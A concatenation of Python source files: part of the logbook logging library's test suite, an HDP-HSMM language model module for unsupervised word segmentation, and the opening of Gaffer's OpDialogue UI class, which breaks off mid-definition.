def test_error_flag(self):
with capturing_stderr_context() as captured:
with logbook.Flags(errors='print'):
with logbook.Flags(errors='silent'):
self.log.warn('Foo {42}', 'aha')
self.assertEqual(captured.getvalue(), '')
with logbook.Flags(errors='silent'):
with logbook.Flags(errors='print'):
self.log.warn('Foo {42}', 'aha')
self.assertNotEqual(captured.getvalue(), '')
with self.assertRaises(Exception) as caught:
with logbook.Flags(errors='raise'):
self.log.warn('Foo {42}', 'aha')
self.assertIn('Could not format message with provided '
'arguments', str(caught.exception))
def test_disable_introspection(self):
with logbook.Flags(introspection=False):
with logbook.TestHandler() as h:
self.log.warn('Testing')
self.assertIsNone(h.records[0].frame)
self.assertIsNone(h.records[0].calling_frame)
self.assertIsNone(h.records[0].module)
class LoggerGroupTestCase(LogbookTestCase):
def test_groups(self):
def inject_extra(record):
record.extra['foo'] = 'bar'
group = logbook.LoggerGroup(processor=inject_extra)
group.level = logbook.ERROR
group.add_logger(self.log)
with logbook.TestHandler() as handler:
self.log.warn('A warning')
self.log.error('An error')
self.assertFalse(handler.has_warning('A warning'))
self.assertTrue(handler.has_error('An error'))
self.assertEqual(handler.records[0].extra['foo'], 'bar')
class DefaultConfigurationTestCase(LogbookTestCase):
def test_default_handlers(self):
with capturing_stderr_context() as stream:
self.log.warn('Aha!')
captured = stream.getvalue()
self.assertIn('WARNING: testlogger: Aha!', captured)
class LoggingCompatTestCase(LogbookTestCase):
def test_basic_compat_with_level_setting(self):
self._test_basic_compat(True)
def test_basic_compat_without_level_setting(self):
self._test_basic_compat(False)
def _test_basic_compat(self, set_root_logger_level):
import logging
from logbook.compat import redirected_logging
# mimic the default logging setting
self.addCleanup(logging.root.setLevel, logging.root.level)
logging.root.setLevel(logging.WARNING)
name = 'test_logbook-%d' % randrange(1 << 32)
logger = logging.getLogger(name)
with logbook.TestHandler(bubble=True) as handler:
with capturing_stderr_context() as captured:
with redirected_logging(set_root_logger_level):
logger.debug('This is from the old system')
logger.info('This is from the old system')
logger.warn('This is from the old system')
logger.error('This is from the old system')
logger.critical('This is from the old system')
self.assertIn(('WARNING: %s: This is from the old system' % name),
captured.getvalue())
if set_root_logger_level:
self.assertEquals(handler.records[0].level, logbook.DEBUG)
else:
self.assertEquals(handler.records[0].level, logbook.WARNING)
def test_redirect_logbook(self):
import logging
from logbook.compat import LoggingHandler
out = StringIO()
logger = logging.getLogger()
old_handlers = logger.handlers[:]
handler = logging.StreamHandler(out)
handler.setFormatter(logging.Formatter(
'%(name)s:%(levelname)s:%(message)s'))
logger.handlers[:] = [handler]
try:
with LoggingHandler() as logging_handler:
self.log.warn("This goes to logging")
pieces = out.getvalue().strip().split(':')
self.assertEqual(pieces, [
'testlogger',
'WARNING',
'This goes to logging'
])
finally:
logger.handlers[:] = old_handlers
class WarningsCompatTestCase(LogbookTestCase):
def test_warning_redirections(self):
from logbook.compat import redirected_warnings
with logbook.TestHandler() as handler:
redirector = redirected_warnings()
redirector.start()
try:
from warnings import warn
warn(RuntimeWarning('Testing'))
finally:
redirector.end()
self.assertEqual(len(handler.records), 1)
self.assertEqual('[WARNING] RuntimeWarning: Testing',
handler.formatted_records[0])
self.assertIn(__file_without_pyc__, handler.records[0].filename)
class MoreTestCase(LogbookTestCase):
@contextmanager
def _get_temporary_file_context(self):
fn = tempfile.mktemp()
try:
yield fn
finally:
try:
os.remove(fn)
except OSError:
pass
@require_module('jinja2')
def test_jinja_formatter(self):
from logbook.more import JinjaFormatter
fmter = JinjaFormatter('{{ record.channel }}/{{ record.level_name }}')
handler = logbook.TestHandler()
handler.formatter = fmter
with handler:
self.log.info('info')
self.assertIn('testlogger/INFO', handler.formatted_records)
@missing('jinja2')
def test_missing_jinja2(self):
from logbook.more import JinjaFormatter
# check the RuntimeError is raised
with self.assertRaises(RuntimeError):
JinjaFormatter('dummy')
def test_colorizing_support(self):
from logbook.more import ColorizedStderrHandler
class TestColorizingHandler(ColorizedStderrHandler):
def should_colorize(self, record):
return True
stream = StringIO()
with TestColorizingHandler(format_string='{record.message}') as handler:
self.log.error('An error')
self.log.warn('A warning')
self.log.debug('A debug message')
lines = handler.stream.getvalue().rstrip('\n').splitlines()
self.assertEqual(lines, [
'\x1b[31;01mAn error',
'\x1b[39;49;00m\x1b[33;01mA warning',
'\x1b[39;49;00m\x1b[37mA debug message',
'\x1b[39;49;00m'
])
def test_tagged(self):
from logbook.more import TaggingLogger, TaggingHandler
stream = StringIO()
second_handler = logbook.StreamHandler(stream)
logger = TaggingLogger('name', ['cmd'])
handler = TaggingHandler(dict(
info=logbook.default_handler,
cmd=second_handler,
both=[logbook.default_handler, second_handler],
))
handler.bubble = False
with handler:
with capturing_stderr_context() as captured:
logger.log('info', 'info message')
logger.log('both', 'all message')
logger.cmd('cmd message')
stderr = captured.getvalue()
self.assertIn('info message', stderr)
self.assertIn('all message', stderr)
self.assertNotIn('cmd message', stderr)
stringio = stream.getvalue()
self.assertNotIn('info message', stringio)
self.assertIn('all message', stringio)
self.assertIn('cmd message', stringio)
def test_external_application_handler(self):
from logbook.more import ExternalApplicationHandler as Handler
with self._get_temporary_file_context() as fn:
handler = Handler([sys.executable, '-c', r'''if 1:
f = open(%(tempfile)s, 'w')
try:
f.write('{record.message}\n')
finally:
f.close()
''' % {'tempfile': repr(fn)}])
with handler:
self.log.error('this is a really bad idea')
with open(fn, 'r') as rf:
contents = rf.read().strip()
self.assertEqual(contents, 'this is a really bad idea')
def test_external_application_handler_stdin(self):
from logbook.more import ExternalApplicationHandler as Handler
with self._get_temporary_file_context() as fn:
handler = Handler([sys.executable, '-c', r'''if 1:
import sys
f = open(%(tempfile)s, 'w')
try:
f.write(sys.stdin.read())
finally:
f.close()
''' % {'tempfile': repr(fn)}], '{record.message}\n')
with handler:
self.log.error('this is a really bad idea')
with open(fn, 'r') as rf:
contents = rf.read().strip()
self.assertEqual(contents, 'this is a really bad idea')
def test_exception_handler(self):
from logbook.more import ExceptionHandler
with ExceptionHandler(ValueError) as exception_handler:
with self.assertRaises(ValueError) as caught:
self.log.info('here i am')
self.assertIn('INFO: testlogger: here i am', caught.exception.args[0])
def test_exception_handler_specific_level(self):
from logbook.more import ExceptionHandler
with logbook.TestHandler() as test_handler:
with self.assertRaises(ValueError) as caught:
with ExceptionHandler(ValueError, level='WARNING') as exception_handler:
self.log.info('this is irrelevant')
self.log.warn('here i am')
self.assertIn('WARNING: testlogger: here i am', caught.exception.args[0])
self.assertIn('this is irrelevant', test_handler.records[0].message)
def test_dedup_handler(self):
from logbook.more import DedupHandler
with logbook.TestHandler() as test_handler:
with DedupHandler():
self.log.info('foo')
self.log.info('bar')
self.log.info('foo')
self.assertEqual(2, len(test_handler.records))
self.assertIn('message repeated 2 times: foo', test_handler.records[0].message)
self.assertIn('message repeated 1 times: bar', test_handler.records[1].message)
class QueuesTestCase(LogbookTestCase):
def _get_zeromq(self, multi=False):
from logbook.queues import ZeroMQHandler, ZeroMQSubscriber
# Get an unused port
tempsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tempsock.bind(('127.0.0.1', 0))
host, unused_port = tempsock.getsockname()
tempsock.close()
# Retrieve the ZeroMQ handler and subscriber
uri = 'tcp://%s:%d' % (host, unused_port)
if multi:
handler = [ZeroMQHandler(uri, multi=True) for _ in range(3)]
else:
handler = ZeroMQHandler(uri)
subscriber = ZeroMQSubscriber(uri, multi=multi)
# Enough time to start
time.sleep(0.1)
return handler, subscriber
@require_module('zmq')
def test_zeromq_handler(self):
tests = [
u('Logging something'),
u('Something with umlauts äöü'),
u('Something else for good measure'),
]
handler, subscriber = self._get_zeromq()
for test in tests:
with handler:
self.log.warn(test)
record = subscriber.recv()
self.assertEqual(record.message, test)
self.assertEqual(record.channel, self.log.name)
@require_module('zmq')
def test_multi_zeromq_handler(self):
tests = [
u('Logging something'),
u('Something with umlauts äöü'),
u('Something else for good measure'),
]
handlers, subscriber = self._get_zeromq(multi=True)
for handler in handlers:
for test in tests:
with handler:
self.log.warn(test)
record = subscriber.recv()
self.assertEqual(record.message, test)
self.assertEqual(record.channel, self.log.name)
@require_module('zmq')
def test_zeromq_background_thread(self):
handler, subscriber = self._get_zeromq()
test_handler = logbook.TestHandler()
controller = subscriber.dispatch_in_background(test_handler)
with handler:
self.log.warn('This is a warning')
self.log.error('This is an error')
# stop the controller. This will also stop the loop and join the
# background process. Before that we give it a fraction of a second
# to get all results
time.sleep(0.2)
controller.stop()
self.assertTrue(test_handler.has_warning('This is a warning'))
self.assertTrue(test_handler.has_error('This is an error'))
@missing('zmq')
def test_missing_zeromq(self):
from logbook.queues import ZeroMQHandler, ZeroMQSubscriber
with self.assertRaises(RuntimeError):
ZeroMQHandler('tcp://127.0.0.1:42000')
with self.assertRaises(RuntimeError):
ZeroMQSubscriber('tcp://127.0.0.1:42000')
@require_module('multiprocessing')
def test_multi_processing_handler(self):
from multiprocessing import Process, Queue
from logbook.queues import MultiProcessingHandler, \
MultiProcessingSubscriber
queue = Queue(-1)
test_handler = logbook.TestHandler()
subscriber = MultiProcessingSubscriber(queue)
def send_back():
handler = MultiProcessingHandler(queue)
handler.push_thread()
try:
logbook.warn('Hello World')
finally:
handler.pop_thread()
p = Process(target=send_back)
p.start()
p.join()
with test_handler:
subscriber.dispatch_once()
self.assert_(test_handler.has_warning('Hello World'))
def test_threaded_wrapper_handler(self):
from logbook.queues import ThreadedWrapperHandler
test_handler = logbook.TestHandler()
with ThreadedWrapperHandler(test_handler) as handler:
self.log.warn('Just testing')
self.log.error('More testing')
# give it some time to sync up
handler.close()
self.assertTrue(not handler.controller.running)
self.assertTrue(test_handler.has_warning('Just testing'))
self.assertTrue(test_handler.has_error('More testing'))
@require_module('execnet')
def test_execnet_handler(self):
def run_on_remote(channel):
import logbook
from logbook.queues import ExecnetChannelHandler
handler = ExecnetChannelHandler(channel)
log = logbook.Logger("Execnet")
handler.push_application()
log.info('Execnet works')
import execnet
gw = execnet.makegateway()
channel = gw.remote_exec(run_on_remote)
from logbook.queues import ExecnetChannelSubscriber
subscriber = ExecnetChannelSubscriber(channel)
record = subscriber.recv()
self.assertEqual(record.msg, 'Execnet works')
gw.exit()
@require_module('multiprocessing')
def test_subscriber_group(self):
from multiprocessing import Process, Queue
from logbook.queues import MultiProcessingHandler, \
MultiProcessingSubscriber, SubscriberGroup
a_queue = Queue(-1)
b_queue = Queue(-1)
test_handler = logbook.TestHandler()
subscriber = SubscriberGroup([
MultiProcessingSubscriber(a_queue),
MultiProcessingSubscriber(b_queue)
])
def make_send_back(message, queue):
def send_back():
with MultiProcessingHandler(queue):
logbook.warn(message)
return send_back
for _ in range(10):
p1 = Process(target=make_send_back('foo', a_queue))
p2 = Process(target=make_send_back('bar', b_queue))
p1.start()
p2.start()
p1.join()
p2.join()
messages = [subscriber.recv().message for i in (1, 2)]
self.assertEqual(sorted(messages), ['bar', 'foo'])
@require_module('redis')
def test_redis_handler(self):
import redis
from logbook.queues import RedisHandler
KEY = 'redis'
FIELDS = ['message', 'host']
r = redis.Redis(decode_responses=True)
redis_handler = RedisHandler(level=logbook.INFO, bubble=True)
#We don't want output for the tests, so we can wrap everything in a NullHandler
null_handler = logbook.NullHandler()
#Check default values
with null_handler.applicationbound():
with redis_handler:
logbook.info(LETTERS)
key, message = r.blpop(KEY)
#Are all the fields in the record?
[self.assertTrue(message.find(field)) for field in FIELDS]
self.assertEqual(key, KEY)
self.assertTrue(message.find(LETTERS))
#Change the key of the handler and check on redis
KEY = 'test_another_key'
redis_handler.key = KEY
with null_handler.applicationbound():
with redis_handler:
logbook.info(LETTERS)
key, message = r.blpop(KEY)
self.assertEqual(key, KEY)
#Check that extra fields are added if specified when creating the handler
FIELDS.append('type')
extra_fields = {'type': 'test'}
del(redis_handler)
redis_handler = RedisHandler(key=KEY, level=logbook.INFO,
extra_fields=extra_fields, bubble=True)
with null_handler.applicationbound():
with redis_handler:
logbook.info(LETTERS)
key, message = r.blpop(KEY)
[self.assertTrue(message.find(field)) for field in FIELDS]
self.assertTrue(message.find('test'))
#And finally, check that fields are correctly added if appended to the
#log message
FIELDS.append('more_info')
with null_handler.applicationbound():
with redis_handler:
logbook.info(LETTERS, more_info='This works')
key, message = r.blpop(KEY)
[self.assertTrue(message.find(field)) for field in FIELDS]
self.assertTrue(message.find('This works'))
class TicketingTestCase(LogbookTestCase):
@require_module('sqlalchemy')
def test_basic_ticketing(self):
from logbook.ticketing import TicketingHandler
with TicketingHandler('sqlite:///') as handler:
for x in xrange(5):
self.log.warn('A warning')
self.log.info('An error')
if x < 2:
try:
1 / 0
except Exception:
self.log.exception()
self.assertEqual(handler.db.count_tickets(), 3)
tickets = handler.db.get_tickets()
self.assertEqual(len(tickets), 3)
self.assertEqual(tickets[0].level, logbook.INFO)
self.assertEqual(tickets[1].level, logbook.WARNING)
self.assertEqual(tickets[2].level, logbook.ERROR)
self.assertEqual(tickets[0].occurrence_count, 5)
self.assertEqual(tickets[1].occurrence_count, 5)
self.assertEqual(tickets[2].occurrence_count, 2)
self.assertEqual(tickets[0].last_occurrence.level, logbook.INFO)
tickets[0].solve()
self.assert_(tickets[0].solved)
tickets[0].delete()
ticket = handler.db.get_ticket(tickets[1].ticket_id)
self.assertEqual(ticket, tickets[1])
occurrences = handler.db.get_occurrences(tickets[2].ticket_id,
order_by='time')
self.assertEqual(len(occurrences), 2)
record = occurrences[0]
self.assertIn(__file_without_pyc__, record.filename)
# avoid 2to3 destroying our assertion
self.assertEqual(getattr(record, 'func_name'), 'test_basic_ticketing')
self.assertEqual(record.level, logbook.ERROR)
self.assertEqual(record.thread, get_ident())
self.assertEqual(record.process, os.getpid())
self.assertEqual(record.channel, 'testlogger')
self.assertIn('1 / 0', record.formatted_exception)
class HelperTestCase(LogbookTestCase):
def test_jsonhelper(self):
from logbook.helpers import to_safe_json
class Bogus(object):
def __str__(self):
return 'bogus'
rv = to_safe_json([
None,
'foo',
u('jäger'),
1,
datetime(2000, 1, 1),
{'jäger1': 1, u('jäger2'): 2, Bogus(): 3, 'invalid': object()},
object() # invalid
])
self.assertEqual(
rv, [None, u('foo'), u('jäger'), 1, '2000-01-01T00:00:00Z',
{u('jäger1'): 1, u('jäger2'): 2, u('bogus'): 3,
u('invalid'): None}, None])
def test_datehelpers(self):
from logbook.helpers import format_iso8601, parse_iso8601
now = datetime.now()
rv = format_iso8601()
self.assertEqual(rv[:4], str(now.year))
self.assertRaises(ValueError, parse_iso8601, 'foo')
v = parse_iso8601('2000-01-01T00:00:00.12Z')
self.assertEqual(v.microsecond, 120000)
v = parse_iso8601('2000-01-01T12:00:00+01:00')
self.assertEqual(v.hour, 11)
v = parse_iso8601('2000-01-01T12:00:00-01:00')
self.assertEqual(v.hour, 13)
class UnicodeTestCase(LogbookTestCase):
# in Py3 we can just assume a more uniform unicode environment
@require_py3
def test_default_format_unicode(self):
with capturing_stderr_context() as stream:
self.log.warn('\u2603')
self.assertIn('WARNING: testlogger: \u2603', stream.getvalue())
@require_py3
def test_default_format_encoded(self):
with capturing_stderr_context() as stream:
# it's a string but it's in the right encoding so don't barf
self.log.warn('\u2603')
self.assertIn('WARNING: testlogger: \u2603', stream.getvalue())
@require_py3
def test_default_format_bad_encoding(self):
with capturing_stderr_context() as stream:
# it's a string, is wrong, but just dump it in the logger,
# don't try to decode/encode it
self.log.warn('Русский'.encode('koi8-r'))
self.assertIn("WARNING: testlogger: b'\\xf2\\xd5\\xd3\\xd3\\xcb\\xc9\\xca'", stream.getvalue())
@require_py3
def test_custom_unicode_format_unicode(self):
format_string = ('[{record.level_name}] '
'{record.channel}: {record.message}')
with capturing_stderr_context() as stream:
with logbook.StderrHandler(format_string=format_string):
self.log.warn("\u2603")
self.assertIn('[WARNING] testlogger: \u2603', stream.getvalue())
@require_py3
def test_custom_string_format_unicode(self):
format_string = ('[{record.level_name}] '
'{record.channel}: {record.message}')
with capturing_stderr_context() as stream:
with logbook.StderrHandler(format_string=format_string):
self.log.warn('\u2603')
self.assertIn('[WARNING] testlogger: \u2603', stream.getvalue())
@require_py3
def test_unicode_message_encoded_params(self):
with capturing_stderr_context() as stream:
self.log.warn("\u2603 {0}", "\u2603".encode('utf8'))
self.assertIn("WARNING: testlogger: \u2603 b'\\xe2\\x98\\x83'", stream.getvalue())
@require_py3
def test_encoded_message_unicode_params(self):
with capturing_stderr_context() as stream:
self.log.warn('\u2603 {0}'.encode('utf8'), '\u2603')
self.assertIn('WARNING: testlogger: \u2603 \u2603', stream.getvalue())
@require_module('gevent')
def test_gevent_spawn(self):
from gevent import spawn, sleep
def func(handler):
with handler.threadbound():
self.log.warn("hi")
sleep(0.1)
self.log.warn("bye")
with capturing_stderr_context() as stream:
stderr_handler = logbook.StderrHandler(format_string="foo")
null_handler = logbook.NullHandler()
f1 = spawn(func, stderr_handler)
f2 = spawn(func, null_handler)
f1.join()
f2.join()
captured = stream.getvalue()
self.assertEquals("foo\nfoo\n", captured)
def suite():
loader = unittest.TestLoader()
suite = LogbookTestSuite()
suite.addTests(loader.loadTestsFromName(__name__))
try:
suite.addTests(loader.loadTestsFromName
('logbook.testsuite.test_contextmanager'))
except SyntaxError:
# Python 2.4 does not support the 'with' statement
pass
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
language.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from multiprocessing import Process, Queue
from HDP_HSMM.basic.distributions import PoissonDuration
from HDP_HSMM.internals.transitions import HDPHMMTransitions
from HDP_HSMM.internals.states import InitialState
from HDP_HSMM.basic.util import sample_discrete, rle, engine_global_namespace
#########################################################
# Word states class #
#########################################################
class WordStates:
def __init__(self, data, model):
self.data = np.asarray(data)
self.model = model
self.T = len(data)
self.stateseq = []
self.letters = []
self.clear_caches()
self.resample()
self.betal
def clear_caches(self):
self._Al = None
self._aDl = None
self._aBl = None
self._dl = None
self._cache_alphal = None
self._durations = None
self._stateseq_norep = None
self.state_ranges = None
@property
def stateseq_norep(self):
if self._stateseq_norep is None:
self._stateseq_norep, dur = rle(self.stateseq)
return self._stateseq_norep
@property
def durations(self):
if self._durations is None:
self._letterseq_norep, self._durations = rle(self.letterseq)
return self._durations
@property
def aDl(self):
if self._aDl is None:
aDl = self._aDl = np.empty((self.T, self.model.state_dim))
possible_durations = np.arange(1, self.T + 1, dtype = np.float64)
for idx, dist in enumerate(self.model.word_dur_dists):
aDl[:, idx] = dist.log_likelihood(possible_durations)
return self._aDl
@property
def aD(self):
return np.exp(self.aDl)
@property
def A(self):
return self.model.trans_dists.A
@property
def Al(self):
if self._Al is None:
self._Al = np.log(self.model.trans_dists.A)
return self._Al
@property
def aBl(self):
if self._aBl is None:
self._aBl = aBl = np.empty((self.T, self.model.letter_dim))
for idx, dist in enumerate(self.model.obs_distns):
aBl[:, idx] = np.nan_to_num(dist.log_likelihood(self.data))
return self._aBl
@property
def dl(self):
if self._dl is None:
self._dl = dl = np.empty((self.T, self.model.letter_dim))
possible_durations = np.arange(1, self.T + 1, dtype = np.float64)
for idx, dist in enumerate(self.model.dur_distns):
dl[:, idx] = dist.log_likelihood(possible_durations)
return self._dl
def resample(self):
self.clear_caches()
betal, betastarl = self.messages_backwards()
self.sample_forwards(betal, betastarl)
def messages_backwards(self, trunc = 60):
Al = self.Al
aDl = self.aDl
state_dim = self.model.state_dim
self.betal = betal = np.zeros((self.T, state_dim), dtype = np.float64)
self.betastarl = betastarl = np.zeros((self.T, state_dim), dtype = np.float64)
T = self.T
for t in range(T - 1, -1, -1):
betastarl[t] = np.logaddexp.reduce(
betal[t:t+trunc] + self.cumulative_likelihoods(t, t + trunc) + aDl[:min(trunc, T-t)],
axis = 0
)
betal[t-1] = np.logaddexp.reduce(betastarl[t] + Al, axis = 1)
betal[-1] = 0.0
return betal, betastarl
def sample_forwards(self, betal, betastarl):
T = self.T
A = self.A
aD = self.aD
stateseq = self.stateseq = np.zeros(T, dtype = np.int32)
state_ranges = self.state_ranges = []
idx = 0
nextstate_unsmoothed = self.model.init_dist.pi_0
while idx < T:
logdomain = betastarl[idx] - np.amax(betastarl[idx])
nextstate_dist = np.exp(logdomain) * nextstate_unsmoothed
if (nextstate_dist == 0.).all():
nextstate_dist = np.exp(logdomain)
state = sample_discrete(nextstate_dist)
durprob = np.random.random()
word = self.model.word_list[state]
dur = len(word) - 1
while durprob > 0:
p_d_prior = aD[dur, state] if dur < T else 1.
assert not np.isnan(p_d_prior)
assert p_d_prior >= 0
if p_d_prior == 0:
dur += 1
continue
if idx + dur < T:
loglikelihood = self.likelihood_block_word(idx, idx+dur+1, word)
mess_term = np.exp(loglikelihood + betal[idx+dur, state] - betastarl[idx, state])
p_d = mess_term * p_d_prior
assert not np.isnan(p_d)
durprob -= p_d
dur += 1
else:
dur += 1
break
assert dur > 0
assert dur >= len(word)
stateseq[idx:idx+dur] = state
state_ranges.append((state, (idx, idx + dur)))
nextstate_unsmoothed = A[state]
idx += dur
def cumulative_likelihoods(self, start, stop):
T = min(self.T, stop)
tsize = T - start
ret = np.zeros((tsize, self.model.state_dim))
for state, word in enumerate(self.model.word_list):
self.likelihood_block_word(start, stop, word)
alphal = self._cache_alphal
ret[:, state] = alphal[:, -1]
return ret
def likelihood_block_word(self, start, stop, word):
T = min(self.T, stop)
tsize = T - start
aBl = self.aBl
len_word = len(word)
self._cache_alphal = alphal = np.ones((tsize, len_word)) * -np.inf
for j, l in enumerate(word):
for t in range(j, tsize - len_word + j + 1):
if j == 0:
alphal[t, j] = np.sum(aBl[start:start+t+1, l]) + self.dl[t, l]
else:
alphal[t, j] = np.logaddexp.reduce([
np.sum(aBl[start+t-d:start+t+1, l]) + \
self.dl[d, l] + \
alphal[t - d - 1, j - 1]
for d in range(t + 1)
])
return alphal[-1, -1]
#########################################################
# Language model class #
#########################################################
class LanguageHSMMModel(object):
def __init__(self, hypparams, letter_hsmm, length_dist, obs_dists, dur_dists, parallel = True):
self.trans_dists = HDPHMMTransitions(**hypparams)
self.letter_hsmm = letter_hsmm
self.length_dist = length_dist
self.state_dim = hypparams['state_dim']
self.letter_dim = len(obs_dists)
self.init_dist = InitialState(state_dim = self.state_dim, rho = 1.0)
self.states_list = []
self.parallel = parallel
word_set = set()
while len(word_set) < self.state_dim:
word = self.generate_word()
word_set.add(word)
self.word_list = list(word_set)
self.resample_dur_dists()
@property
def obs_distns(self):
return self.letter_hsmm.obs_distns
@property
def dur_distns(self):
return self.letter_hsmm.dur_distns
def generate_word(self):
size = self.length_dist.rvs() or 1
return self.letter_hsmm.generate_word(size)
def generate(self, limit_len = 3):
nextstate_dist = self.init_dist.pi_0
A = self.trans_dists.A
state_list = []
for _ in range(limit_len):
state = sample_discrete(nextstate_dist)
state_list.append(state)
nextstate_dist = A[state]
stateseq = []
letseq = []
obsseq = []
for s in state_list:
for l in self.word_list[s]:
d = self.dur_distns[l].rvs() or 1
o = self.obs_distns[l].rvs(size = d)
obsseq.append(o)
letseq.append([l] * d)
stateseq.append([s] * d)
return map(np.concatenate, (stateseq, letseq, obsseq))
def add_data(self, data):
from HDP_HSMM import parallel
self.states_list.append(WordStates(data, self))
# parallel = true なら下記がないとエラーになる
if self.parallel:
parallel.add_data(self.states_list[-1].data)
def resample_model(self):
if self.parallel:
self.resample_states_parallel()
else:
self.resample_states()
self.resample_letter_params()
self.resample_dur_dists()
self.resample_trans_dist()
self.resample_init_dist()
def resample_trans_dist(self):
self.trans_dists.resample(np.array([[state for (state, _) in s.state_ranges] for s in self.states_list]))
def resample_init_dist(self):
self.init_dist.resample([s.stateseq[:1] for s in self.states_list])
def resample_states(self):
[s.resample() for s in self.states_list]
def resample_states_parallel(self):
from HDP_HSMM import parallel
states = self.states_list
self.states_list = []
raw = parallel.map_on_each(
self._states_sampler,
[s.data for s in states],
kwargss = self._get_parallel_kwargss(states),
engine_globals = dict(global_model = self)
)
self.states_list = states
# 下記の例では状態ラベルと状態持続範囲を結果に受け取っている
"""
for s1, ret in zip(self.states_list, raw):
s1.stateseq, s1.state_ranges = ret
"""
for s1, ret in zip(self.states_list, raw):
s1.stateseq = ret.stateseq
s1.state_ranges = ret.state_ranges
s1.betal = ret.betal
@staticmethod
@engine_global_namespace
def _states_sampler(data):
global_model.add_data(data = data)
model = global_model.states_list.pop()
# 下記の例では計算結果のモデル中の状態ラベルと状態持続範囲を取得している
"""
return model.stateseq, model.state_ranges
"""
return model
def resample_letter_params(self):
states_index = [0]
hsmm = self.letter_hsmm
hsmm.states_list = []
for s in self.states_list:
s.letterseq = np.ones(len(s.data), dtype = np.int64) * -1
for state in range(self.state_dim):
for s in self.states_list:
for state2, (start, stop) in s.state_ranges:
if state == state2:
hsmm.add_data_parallel(s.data[start:stop])
hsmm.states_list[-1].letterseq = s.letterseq[start:stop]
states_index.append(len(hsmm.states_list))
hsmm.resample_states_parallel()
likelihoods = hsmm.likelihoods()
state_count = {}
for state, bound in enumerate(zip(states_index[:-1], states_index[1:])):
staff = range(*bound)
if len(staff) == 0:
self.word_list[state] = self.generate_word()
continue
candidates = []
scores = []
for idx in staff:
rest = set(staff) - set([idx])
word = hsmm.states_list[idx].stateseq_norep
## parallelize: nakashima edit
def multi_bw(hsmm,word,s,q):
q.put(hsmm.states_list[s].likelihood_block_word(0, len(hsmm.states_list[s].data), word))
q = Queue()
pr_l = []
for s in rest:
pr = Process(target=multi_bw, args=(hsmm,word,s,q))
pr_l.append(pr)
pr.start()
for p in pr_l:
p.join()
q_l = [q.get() for i in range(len(pr_l))]
score = np.sum(q_l) + likelihoods[idx]
## -------------------------------------
"""
score = np.sum([hsmm.states_list[s].likelihood_block_word(0, len(hsmm.states_list[s].data), word) for s in rest]) + likelihoods[idx]
"""
scores.append(score)
candidates.append(tuple(word))
resample_state_flag = len(set(candidates)) > 1
if resample_state_flag:
word_idx = sample_discrete(np.exp(scores))
sampleseq = candidates[word_idx]
else:
sampleseq = candidates[0]
self.word_list[state] = tuple(sampleseq)
for idx in staff:
s = hsmm.states_list[idx]
s.letterseq[:] = s.stateseq
word = tuple(s.stateseq_norep)
hsmm.resample_trans_distn()
hsmm.resample_init_state_distn()
hsmm.resample_dur_distns()
hsmm.resample_obs_distns()
self.resample_length_dist()
def resample_length_dist(self):
self.length_dist.resample(np.array(map(len, self.word_list)))
def resample_dur_dists(self):
self.word_dur_dists = [
PoissonDuration(lmbda = np.sum([self.dur_distns[c].lmbda for c in w]))
for w in self.word_list
]
def _get_parallel_kwargss(self,states_objs):
# this method is broken out so that it can be overridden
return [{}]*len(states_objs)
|
OpDialogue.py
|
##########################################################################
#
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import sys
import threading
import traceback
import IECore
import Gaffer
import GafferUI
## A dialogue which allows a user to edit the parameters of an
# IECore.Op instance and then execute it.
class OpDialogue( GafferUI.Dialogue ) :
## Defines what happens when the op has been successfully executed :
#
# FromUserData : Get behaviour from ["UI"]["postExecuteBehaviour"] userData, which should
# contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to DisplayResult.
#
# None : Do nothing. The dialogue returns to the parameter editing state.
#
# Close : The dialogue is closed immediately.
#
# DisplayResult : The result is displayed, with a button for returning to the parameter editing state.
#
# DisplayResultAndClose : The result is displayed, with a button for closing the dialogue.
#
# NoneByDefault : deprecated - the same as DisplayResult
# CloseByDefault : deprecated - the same as DisplayResult
PostExecuteBehaviour = IECore.Enum.create( "FromUserData", "None", "Close", "DisplayResult", "DisplayResultAndClose", "NoneByDefault", "CloseByDefault" )
## Defines which button has the focus when the op is displayed for editing.
#
# FromUserData : Gets the default button from ["UI"]["defaultButton"] userData, which
# should contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to OK.
#
# None : Neither button has the focus.
#
# OK : The OK button has the focus.
#
# Cancel : The cancel button has the focus.
DefaultButton = IECore.Enum.create( "FromUserData", "None", "OK", "Cancel" )
# If executeInBackground is True, then the Op will be executed on another
# thread, allowing the UI to remain responsive during execution. This is
# the preferred method of operation, but it is currently not the default
# in case certain clients are relying on running the Op on the main thread.
def __init__(
self,
opInstanceOrOpHolderInstance,
title=None,
sizeMode=GafferUI.Window.SizeMode.Manual,
postExecuteBehaviour = PostExecuteBehaviour.FromUserData,
